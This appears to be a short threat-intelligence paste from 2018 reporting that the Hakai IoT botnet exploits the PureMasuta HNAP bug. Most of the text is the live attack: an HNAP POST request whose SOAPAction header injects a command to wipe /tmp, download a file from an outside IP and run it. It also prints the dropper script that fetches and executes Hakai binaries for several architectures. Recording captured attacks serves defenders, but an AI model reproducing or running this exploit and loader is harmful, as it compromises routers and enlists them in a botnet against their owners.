Advertisement
ankit_anubhav

Hakai IoT botnet using PureMasuta Bug

Aug 19th, 2018
595
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.09 KB | None | 0 0
  1. Hakai botnet now loaded with PureMasuta bug.
  2.  
  3. POST /HNAP1/ HTTP/1.0
  4. Content-Type: text/xml; charset="utf-8"
  5. SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://50.115.166.136/bin && sh /tmp/bin`
  6. Content-Length: 640
  7.  
  8. <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
  9.  
  10. Let us see see what http://50.115.166.136/bin is hosting.
  11. Its HAKAI !
  12. #!/bin/sh
  13.  
  14. n="hakai.mips hakai.mpsl ea4 ea7 hakai.x86_64"
  15. http_server="50.115.166.136"
  16.  
  17. for a in $n
  18. do
  19. busybox wget http://$http_server/$a -O -> /tmp/$a
  20. busybox chmod 777 /tmp/$a
  21. /tmp/$a
  22. done
  23.  
  24. for a in $n
  25. do
  26. rm -rf /tmp/$a
  27. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement